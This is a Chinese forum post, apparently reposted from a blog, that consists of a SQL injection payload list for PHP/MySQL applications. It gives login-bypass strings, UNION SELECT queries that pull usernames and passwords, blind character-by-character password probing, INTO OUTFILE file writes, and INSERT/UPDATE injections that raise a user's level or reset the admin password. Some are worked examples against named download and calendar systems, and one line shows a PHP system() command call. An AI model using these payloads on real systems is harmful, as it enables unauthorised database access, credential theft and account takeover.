设为首页 收藏本站
查看: 1146|回复: 0

[经验分享] php小跑 分享

[复制链接]

尚未签到

发表于 2018-12-24 09:05:19 | 显示全部楼层 |阅读模式
  php注射库
  ' or 1=1
  ' or '1=1
  '/*
  '%23
  ' and password='mypass
  id=-1 union select 1,1,1
  id=-1 union select char(97),char(97),char(97)
  id=1 union select 1,1,1 from members
  id=1 union select 1,1,1 from admin
  id=1 union select 1,1,1 from user
  userid=1 and password=mypass
  userid=1 and mid(password,3,1)=char(112)
  userid=1 and mid(password,4,1)=char(97)
  and ord(mid(password,3,1))>111 (ord函数很好用,可以返回整形的)
  ' and LENGTH(password)='6(探测密码长度)
  ' and LEFT(password,1)='m
  ' and LEFT(password,2)='my
  …………………………依次类推
  ' union select 1,username,password from user/*
  ' union select 1,username,password from user/*
  =' union select 1,username,password from user/* (可以是1或者=后直接跟)
  99999' union select 1,username,password from user/*
  ' into outfile 'c:/file.txt (导出文件)
  =' or 1=1 into outfile 'c:/file.txt
  1' union select 1,username,password from user into outfile 'c:/user.txt
  select password FROM admins where login='John' INTO DUMPFILE '/path/to/site/file.txt'
  id=' union select 1,username,password from user into outfile
  id=-1 union select 1,database(),version() (灵活应用查询)
  常用查询测试语句,
  select * FROM table where 1=1
  select * FROM table where 'uuu'='uuu'
  select * FROM table where 12
  select * FROM table where 3>2
  select * FROM table where 20 THEN 1 END
  例如:夜猫下载系统1.0版本
  id=1 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
  union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user
  union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1
  id=10000 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and groupid=1
  union select 1,username,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 (替换,寻找密码)
  union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,1,1))=49 (验证第一位密码)
  union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,2,1))=50 (第二位)
  union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,3,1))=51
  …………………………………………………………
  例如2:灰色轨迹 变换id进行测试(meteor)
  union%20(select%20allowsmilies,public,userid,'0000-0-0',user(),version()%20FROM%20calendar_events%20where%20eventid%20=%2013)%20order%20by%20eventdate
  union%20(select%20allowsmilies,public,userid,'0000-0-0',pass(),version()%20FROM%20calendar_events%20where%20eventid%20=%2010)%20order%20by%20eventdate
  构造语句:
  select allowsmilies,public,userid,eventdate,event,subject FROM calendar_events where eventid = 1 union (select 1,1,1,1,1,1,1 from user where userid=1)
  select allowsmilies,public,userid,eventdate,event,subject FROM calendar_events where eventid = 1 union (select 1,1,1,1,username,password from user where userid=1)
  union%20(select%201,0,2,'1999-01-01','a',password%20FROM%20user%20where%20userid%20=%205)%20order%20by%20eventdate
  union%20(select%201,0,12695,'1999-01-01','a',password%20FROM%20user%20where%20userid=13465)%20order%20by%20eventdate
  union%20(select%201,0,12695,'1999-01-01','a',userid%20FROM%20user%20where%20username='sandflee')%20order%20by%20eventdate (查 沙子的id)
  (select a FROM table_name where a=10 AND B=1 ORDER BY a LIMIT 10)
  select * FROM article where articleid='$id' union select * FROM……(字段和数据库相同情况下,可直接提交)
  select * FROM article where articleid='$id' union select 1,1,1,1,1,1,1 FROM……(不同的情况下)
  特殊技巧:在表单,搜索引擎等地方写:
  "___"
  ".__ "
  "%
  %' ORDER BY articleid/*
  %' ORDER BY articleid#
  __' ORDER BY articleid/*
  __' ORDER BY articleid#
  $command = "dir c:\";system($command);
  select * FROM article where articleid='$id'
  select * FROM article where articleid=$id
  1' and 1=2 union select * from user where userid=1/* 句中变为
  (select * FROM article where articleid='1' and 1=2 union select * from user where userid=1/*')
  1 and 1=2 union select * from user where userid=1
  语句形式:建立一个库,插入:
  create DATABASE `injection`
  create TABLE `user` (
  `userid` int(11) NOT NULL auto_increment,
  `username` varchar(20) NOT NULL default '',
  `password` varchar(20) NOT NULL default '',
  PRIMARY KEY (`userid`)
  ) ;
  insert INTO `user` VALUES (1, 'swap', 'mypass');
  插如一个注册用户:
  insert INTO `user` (userid, username, password, homepage, userlevel) VALUES ('', '$username', '$password', '$homepage', '1');
  "insert INTO membres (login,password,nom,email,userlevel) VALUES ('$login','$pass','$nom','$email','1')";
  insert INTO membres (login,password,nom,email,userlevel) VALUES ('','','','','3')#','1')
  "insert INTO membres SET login='$login',password='$pass',nom='$nom',email='$email'";
  insert INTO membres SET login='',password='',nom='',userlevel='3',email=''
  "insert INTO membres VALUES ('$id','$login','$pass','$nom','$email','1')";
  update user SET password='$password', homepage='$homepage' where id='$id'
  update user SET password='MD5(mypass)' where username='admin'#)', homepage='$homepage' where id='$id'
  "update membres SET password='$pass',nom='$nom',email='$email' where id='$id'";
  update membres SET password='[PASS]',nom='',userlevel='3',email=' ' where id='[ID]'
  "update news SET Votes=Votes+1, score=score+$note where idnews='$id'";
  长用函数:
  DATABASE()
  USER()
  SYSTEM_USER()
  SESSION_USER()
  CURRENT_USER()
  比如:
  update article SET title=$title where articleid=1 对应函数
  update article SET title=DATABASE() where id=1
  #把当前数据库名更新到title字段
  update article SET title=USER() where id=1
  #把当前 MySQL 用户名更新到title字段
  update article SET title=SYSTEM_USER() where id=1
  #把当前 MySQL 用户名更新到title字段
  update article SET title=SESSION_USER() where id=1
  #把当前 MySQL 用户名更新到title字段
  update article SET title=CURRENT_USER() where id=1
  #把当前会话被验证匹配的用户名更新到title字段
  :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
  $req = "select * FROM membres where name like '%$search%' ORDER BY name";
  select * FROM membres where name like '%%' ORDER BY uid#%' ORDER BY name
  select * FROM membres where name like '%%' ORDER BY uid#%' ORDER BY name
  select uid FROM admins where login='' OR 'a'='a' AND password='' OR 'a'='a' (经典)
  select uid FROM admins where login='' OR admin_level=1#' AND password=''
  select * FROM table where msg like '%hop'
  select uid FROM membres where login='Bob' AND password like 'a%'#' AND password=''
  select * FROM membres where name like '%%' ORDER BY uid#%' ORDER BY name
  http://laoxiege.blog.sohu.com/161688323.html


运维网声明 1、欢迎大家加入本站运维交流群:群②:261659950 群⑤:202807635 群⑦870801961 群⑧679858003
2、本站所有主题由该帖子作者发表,该帖子作者与运维网享有帖子相关版权
3、所有作品的著作权均归原作者享有,请您和我们一样尊重他人的著作权等合法权益。如果您对作品感到满意,请购买正版
4、禁止制作、复制、发布和传播具有反动、淫秽、色情、暴力、凶杀等内容的信息,一经发现立即删除。若您因此触犯法律,一切后果自负,我们对此不承担任何责任
5、所有资源均系网友上传或者通过网络收集,我们仅提供一个展示、介绍、观摩学习的平台,我们不对其内容的准确性、可靠性、正当性、安全性、合法性等负责,亦不承担任何法律责任
6、所有作品仅供您个人学习、研究或欣赏,不得用于商业或者其他用途,否则,一切后果均由您自己承担,我们对此不承担任何法律责任
7、如涉及侵犯版权等问题,请您及时通知我们,我们将立即采取措施予以解决
8、联系人Email:admin@iyunv.com 网址:www.yunweiku.com

所有资源均系网友上传或者通过网络收集,我们仅提供一个展示、介绍、观摩学习的平台,我们不对其承担任何法律责任,如涉及侵犯版权等问题,请您及时通知我们,我们将立即处理,联系人Email:kefu@iyunv.com,QQ:1061981298 本贴地址:https://www.yunweiku.com/thread-655103-1-1.html 上篇帖子: php中的数反转 下篇帖子: 在PHP使用MemCached
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

扫码加入运维网微信交流群X

扫码加入运维网微信交流群

扫描二维码加入运维网微信交流群,最新一手资源尽在官方微信交流群!快快加入我们吧...

扫描微信二维码查看详情

客服E-mail:kefu@iyunv.com 客服QQ:1061981298


QQ群⑦:运维网交流群⑦ QQ群⑧:运维网交流群⑧ k8s群:运维网kubernetes交流群


提醒:禁止发布任何违反国家法律、法规的言论与图片等内容;本站内容均来自个人观点与网络等信息,非本站认同之观点.


本站大部分资源是网友从网上搜集分享而来,其版权均归原作者及其网站所有,我们尊重他人的合法权益,如有内容侵犯您的合法权益,请及时与我们联系进行核实删除!



合作伙伴: 青云cloud

快速回复 返回顶部 返回列表